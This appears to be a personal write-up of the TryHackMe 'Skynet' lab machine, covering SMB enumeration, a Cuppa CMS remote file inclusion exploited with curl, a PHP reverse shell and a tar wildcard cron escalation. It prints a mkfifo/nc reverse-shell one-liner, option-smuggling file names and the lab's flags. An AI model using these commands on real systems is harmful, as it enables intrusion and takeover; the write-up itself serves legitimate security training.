This is my write-up for the machine on TryHackMe known as Skynet:

I start off by a running an nmap scan:

sudo nmap -T4 -A -vv -sS -p- -oN nmap_skynet.txt 

The results I get are the following:

# Nmap 7.91 scan initiated Mon Sep  6 15:37:11 2021 as: nmap -T4 -A -vv -sS -p- -oN nmap_skynet.txt
Increasing send delay for from 5 to 10 due to 11 out of 21 dropped probes since last increase.
Warning: giving up on port because retransmission cap hit (6).
Nmap scan report for
Host is up, received reset ttl 61 (0.098s latency).
Scanned at 2021-09-06 15:37:11 EDT for 927s
Not shown: 65525 closed ports
Reason: 65525 resets
22/tcp    open     ssh         syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKeTyrvAfbRB4onlz23fmgH5DPnSz07voOYaVMKPx5bT62zn7eZzecIVvfp5LBCetcOyiw2Yhocs0oO1/RZSqXlwTVzRNKzznG4WTPtkvD7ws/4tv2cAGy1lzRy9b+361HHIXT8GNteq2mU+boz3kdZiiZHIml4oSGhI+/+IuSMl5clB5/FzKJ+mfmu4MRS8iahHlTciFlCpmQvoQFTA5s2PyzDHM6XjDYH1N3Euhk4xz44Xpo1hUZnu+P975/GadIkhr/Y0N5Sev+Kgso241/v0GQ2lKrYz3RPgmNv93AIQ4t3i3P6qDnta/06bfYDSEEJXaON+A9SCpk2YSrj4A7
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0UWS0x1ZsOGo510tgfVbNVhdE5LkzA4SWDW/5UjDumVQ7zIyWdstNAm+lkpZ23Iz3t8joaLcfs8nYCpMGa/xk=
|   256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICHVctcvlD2YZ4mLdmUlSwY8Ro0hCDMKGqZ2+DuI0KFQ
80/tcp    open     http        syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp   open     pop3        syn-ack ttl 61 Dovecot pop3d
139/tcp   open     netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open     imap        syn-ack ttl 61 Dovecot imapd
|_imap-capabilities: capabilities have IMAP4rev1 post-login SASL-IR listed more Pre-login LOGIN-REFERRALS LOGINDISABLEDA0001 ENABLE OK ID LITERAL+ IDLE
445/tcp   open     netbios-ssn syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8851/tcp  filtered unknown     no-response
24495/tcp filtered unknown     no-response
31760/tcp filtered unknown     no-response
43412/tcp filtered unknown     no-response
<Redacted extra info>

Going to the website, I see:

I then ran feroxbuster on the IP address:

feroxbuster --url -w directory-list-2.3-big.txt

This resulted in:

[>-------------------] - 7m    599288/25476360 4h      found:31      errors:58333  
[>-------------------] - 7m     48073/1273818 111/s
[>-------------------] - 7m     44397/1273818 103/s
[>-------------------] - 7m     46814/1273818 109/s
[>-------------------] - 7m     41748/1273818 98/s
[>-------------------] - 7m     41566/1273818 98/s
[>-------------------] - 6m     39220/1273818 93/s
[>-------------------] - 6m     38660/1273818 96/s
[>-------------------] - 5m     25328/1273818 73/s
[>-------------------] - 5m     23502/1273818 69/s
[>-------------------] - 5m     27861/1273818 83/s
[>-------------------] - 5m     24115/1273818 72/s
[>-------------------] - 5m     25772/1273818 77/s
[>-------------------] - 5m     21173/1273818 64/s
[>-------------------] - 5m     23467/1273818 71/s
[>-------------------] - 5m     23831/1273818 76/s
[>-------------------] - 5m     23040/1273818 74/s
[>-------------------] - 5m     21175/1273818 69/s
[>-------------------] - 4m     20956/1273818 73/s
[>-------------------] - 4m     20306/1273818 78/s
[>-------------------] - 4m     18264/1273818 74/s

One of the links led me to a site:

I then viewed the hint for the first question:

I then realized I will have to go with this route first. Looking back at the nmap scan, we see that port 445 seems to be for Samba. Using enum4linux, I saw the following shares:

//$  Mapping: DENIED, Listing: N/A
//       Mapping: OK, Listing: OK
//      Mapping: DENIED, Listing: N/A
//$    [E] Can't understand response:

I also got the following users using enum4linux:

S-1-22-1-1001 Unix User\milesdyson (Local User)
S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-513 SKYNET\None (Domain Group)

The enum4linux information is verified by smbmap:

There seems to be read access to they anonymous disk. Using smbclient I was able to see a couple files:

There was also a directory called logs:

I downloaded all of those files to my local machine using "mget *". I viewed all of the downloaded files.

The log files seemed to contain passwords. I went back to the mail site and entered the username milesdyson and password cyborg007haloterminator and I got in:

What is Miles password for his emails? cyborg007haloterminator

There does seem to be another user here serenakogan. I kept that in my notes just for future reference. The email from skynet@skynet seemed to have some interesting information in it:

Using that password, I was able to log into miles' samba share:

In the notes directory, I found a file called important.txt. In it it contained the following information:

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

This points us to the answer for our next question.

What is the hidden directory? /45kra24zxs28v3yd

What is the vulnerability called when you can include a remote file for malicious purposes? remote file inclusion

Visiting that directory online leads to a new page:

I then ran feroxbuster again on this directory leading to the following results:

[>-------------------] - 1m     20462/1185239 217/s
[>-------------------] - 1m     11588/1185239 146/s
[>-------------------] - 1m     10241/1185239 134/s
[>-------------------] - 1m     13158/1185239 174/s
[>-------------------] - 1m     12527/1185239 165/s
[>-------------------] - 1m     12172/1185239 162/s
[>-------------------] - 1m      7290/1185239 97/s
[>-------------------] - 1m     13761/1185239 186/s
[>-------------------] - 1m      6704/1185239 91/s

I then found this site using the link of

Using searchsploit, I then realized that there was a exploit for this CMS, and it is Remote File Inclusion!

I then copied that file locally running:

cp /usr/share/exploitdb/exploits/php/webapps/25971.txt .

I noticed a person on using the same vulnerability but using curl. I modified their command to work with my situation:

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd

This did give me a result:

        function CloseDefaultAlert(){
                SetAlert(false, "", "#alert");
                setTimeout(function () {SetBlockade(false)}, 200);
        function ShowAlert(){
                _width = '';
                _height = '';
                jQuery('#alert').animate({width:parseInt(_width), height:parseInt(_height), 'margin-left':-(parseInt(_width)*0.5)+20, 'margin-top':-(parseInt(_height)*0.5)+20 }, 300, "easeInOutCirc", CompleteAnimation);
                        function CompleteAnimation(){
                                jQuery("#btnClose_alert").css('visibility', "visible");
                                jQuery("#description_alert").css('visibility', "visible");
                                jQuery("#content_alert").css('visibility', "visible");
<div class="alert_config_field" id="alert" style="z-index:;">
    <div class="btnClose_alert" id="btnClose_alert" onclick="javascript:CloseDefaultAlert();"></div>
        <div class="description_alert" id="description_alert"><b>Field configuration: </b></div>
    <div class="separator" style="margin-bottom:15px;"></div>
    <div id="content_alert" class="content_alert">
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
dovecot:x:111:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:112:120:Dovecot login user,,,:/nonexistent:/bin/false
mysql:x:114:123:MySQL Server,,,:/nonexistent:/bin/false

...but not something too helpful. I tried this for /etc/shadow as well, but it did not seem to work. I then viewed the exploit once more and tried running the following:

I then got an output!

If you decode the whole string using Base64, you get the following:

	class Configuration{
		public $host = "localhost";
		public $db = "cuppa";
		public $user = "root";
		public $password = "password123";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "";
		public $secure_login_redirect = "";

Here, we can see the username and password. I looked back at the nmap scan and realized that port 22 (SSH) is open. Maybe this is a password for that. It was not. After I was stuck for a while, I viewed the writeup here, and realized that I have to access the file using the URL. For that, I found the php-reverse-shell file, and then edited the IP address and port number. I then ran two commands on two different terminals:

python -m SimpleHTTPServer 80 //To serve the file to the Cuppa CMS
nc -lvnp 1234 //To get the reverse connection

I was able to get a reverse shell after visiting (hello.php is what I renamed my php reverse shell to):

I was able to move around and find the user flag:

What is the user flag? 7ce5c2109a40f958099283600a9ae807

I then had the user file. I then had to get the root file. I referenced the same write-up mentioned above to see what they did for this. The author ends up using in order to get a root shell. I was again lost, and ended up finding the write-up at this page, and they ran the following commands:

cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP_address> 443 > /tmp/f" >>
touch "/var/www/html/--checkpoint-action=exec=sh"
touch "/var/www/html/--checkpoint=1"

You then run rlwrap nc -nvlp 443 in order to wait for the crobjob to run**:**

You then get the root flag.

What is the root flag? 3f0372db24753accc7179a282cd6a949

Last updated